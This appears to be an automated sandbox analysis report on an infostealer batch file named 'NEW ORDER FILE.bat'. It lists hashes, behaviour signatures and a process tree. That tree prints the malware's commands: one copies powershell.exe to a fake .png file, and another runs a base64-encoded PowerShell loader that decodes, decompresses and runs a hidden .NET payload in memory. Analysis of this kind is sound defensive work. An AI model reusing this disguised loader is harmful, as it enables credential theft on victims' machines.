Analysis

  • max time kernel
    142s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-10-2023 07:49

General

  • Target

    NEW ORDER FILE.bat

  • Size

    1.7MB

  • MD5

    d6af0bfbb45c5d0b02613fb9347210c5

  • SHA1

    e7192006d2bd1de89e9a18de2cda62e8b6ceb0c6

  • SHA256

    9848b1d683d2014c2b8a87ffb00f8d82b781f7f76d243a997a39e7864a49468d

  • SHA512

    4aa5a9da343ed676d7f2b14a76a13e26546dcde7e345d8f3e02f89f9b8631c756a0cc30eb1dd21a1515f75e16dd4065d88fba130282c88c70e3fddb80fdeab93

  • SSDEEP

    24576:Xd0nFJzwsyF4bjlnttBX7cu1ms60MXNcB7ZKMzqAML2Z8XWNzQgBBCVY9yFxwCg4:kFZyAz2aZJxPt2gB0w2Slq

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NEW ORDER FILE.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4104
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\NEW ORDER FILE.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3284
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo F "
        3⤵
          PID:1376
        • C:\Windows\system32\xcopy.exe
          xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Esvcsqfelsa.png
          3⤵
            PID:4896
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo F "
            3⤵
              PID:632
            • C:\Windows\system32\xcopy.exe
              xcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\NEW ORDER FILE.bat" C:\Users\Admin\AppData\Local\Temp\Esvcsqfelsa.png.bat
              3⤵
                PID:5080
              • C:\Users\Admin\AppData\Local\Temp\Esvcsqfelsa.png
                C:\Users\Admin\AppData\Local\Temp\Esvcsqfelsa.png -win 1 -enc JABVAHoAcwBzAHkAawB5AGkAZwBhAHYAIAA9ACAAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIALgBiAGEAdAAiACkALAAgAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AbABhAHMAdAAgADEAOwAgACQAUQBuAGsAYgBnAGEAcwBuAHYAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVQB6AHMAcwB5AGsAeQBpAGcAYQB2ACkAOwAkAE8AeABhAGgAcwBtAGIAaQB4AGUAZwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAUQBuAGsAYgBnAGEAcwBuAHYAIAApADsAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASwBzAGYAegB3AGQAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABPAHgAYQBoAHMAbQBiAGkAeABlAGcALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEsAcwBmAHoAdwBkAGIALgBDAG8AcAB5AFQAbwAoACAAJABvAHUAdABwAHUAdAAgACkAOwAkAEsAcwBmAHoAdwBkAGIALgBDAGwAbwBzAGUAKAApADsAJABPAHgAYQBoAHMAbQBiAGkAeABlAGcALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABRAG4AawBiAGcAYQBzAG4AdgAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABRAG4AawBiAGcAYQBzAG4AdgApADsAIAAkAFIAegBuAHcAagBuAHoAbwBlAGcAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABRAG4AawBiAGcAYQBzAG4AdgApADsAIAAkAE4AaQBtAHkAaABkAGEAcwAgAD0AIAAkAFIAegBuAHcAagBuAHoAbwBlAGcAcQAuAEcAZQB0AEUAeABwAG8AcgB0AGUAZABUAHkAcABlAHMAKAApAFsAMABdADsAIAAkAEkAZwBwAHEAbAB4AHIAIAA9ACAAJABOAGkAbQB5AGgAZABhAHMALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQBbADAAXQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
                3⤵
                • Executes dropped EXE
                • Accesses Microsoft Outlook profiles
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • outlook_office_path
                • outlook_win_path
                PID:1560

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\Esvcsqfelsa.png

            Filesize

            442KB

            MD5

            04029e121a0cfa5991749937dd22a1d9

            SHA1

            f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

            SHA256

            9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

            SHA512

            6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

          • C:\Users\Admin\AppData\Local\Temp\Esvcsqfelsa.png.bat

            Filesize

            1.7MB

            MD5

            d6af0bfbb45c5d0b02613fb9347210c5

            SHA1

            e7192006d2bd1de89e9a18de2cda62e8b6ceb0c6

            SHA256

            9848b1d683d2014c2b8a87ffb00f8d82b781f7f76d243a997a39e7864a49468d

            SHA512

            4aa5a9da343ed676d7f2b14a76a13e26546dcde7e345d8f3e02f89f9b8631c756a0cc30eb1dd21a1515f75e16dd4065d88fba130282c88c70e3fddb80fdeab93

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1mlrll3k.jwb.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/1560-9-0x000001084CA30000-0x000001084CA52000-memory.dmp

            Filesize

            136KB

          • memory/1560-19-0x000001084B130000-0x000001084B140000-memory.dmp

            Filesize

            64KB

          • memory/1560-18-0x00007FFDF7E50000-0x00007FFDF8911000-memory.dmp

            Filesize

            10.8MB

          • memory/1560-21-0x0000010865D60000-0x0000010865EBA000-memory.dmp

            Filesize

            1.4MB

          • memory/1560-22-0x000001084CF30000-0x000001084CFAA000-memory.dmp

            Filesize

            488KB

          • memory/1560-23-0x0000010865CD0000-0x0000010865D36000-memory.dmp

            Filesize

            408KB

          • memory/1560-24-0x0000010865FC0000-0x0000010866095000-memory.dmp

            Filesize

            852KB

          • memory/1560-25-0x00007FFDF7E50000-0x00007FFDF8911000-memory.dmp

            Filesize

            10.8MB

          • memory/1560-26-0x000001084B130000-0x000001084B140000-memory.dmp

            Filesize

            64KB

          • memory/1560-27-0x000001084B130000-0x000001084B140000-memory.dmp

            Filesize

            64KB

          • memory/1560-28-0x000001084B130000-0x000001084B140000-memory.dmp

            Filesize

            64KB

          • memory/1560-29-0x0000010866170000-0x0000010866240000-memory.dmp

            Filesize

            832KB

          • memory/1560-30-0x000001084B130000-0x000001084B140000-memory.dmp

            Filesize

            64KB

          • memory/1560-31-0x000001084B130000-0x000001084B140000-memory.dmp

            Filesize

            64KB

          • memory/1560-32-0x0000010866240000-0x0000010866348000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-33-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-34-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-36-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-38-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-40-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-42-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-44-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-46-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-48-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-50-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-52-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-54-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-56-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-58-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-60-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-62-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-64-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-66-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-68-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-70-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-72-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-74-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-76-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-78-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-80-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-82-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-84-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-86-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-88-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-90-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-92-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-94-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-96-0x0000010866240000-0x0000010866344000-memory.dmp

            Filesize

            1.0MB

          • memory/1560-988-0x000001084B130000-0x000001084B140000-memory.dmp

            Filesize

            64KB

          • memory/1560-991-0x000001084B130000-0x000001084B140000-memory.dmp

            Filesize

            64KB

          • memory/1560-2207-0x0000010866350000-0x00000108663EE000-memory.dmp

            Filesize

            632KB

          • memory/1560-2208-0x00000108663F0000-0x000001086643C000-memory.dmp

            Filesize

            304KB

          • memory/1560-2209-0x0000010865D30000-0x0000010865D56000-memory.dmp

            Filesize

            152KB

          • memory/1560-2228-0x0000010866490000-0x000001086650A000-memory.dmp

            Filesize

            488KB

          • memory/1560-2257-0x00007FFDF7E50000-0x00007FFDF8911000-memory.dmp

            Filesize

            10.8MB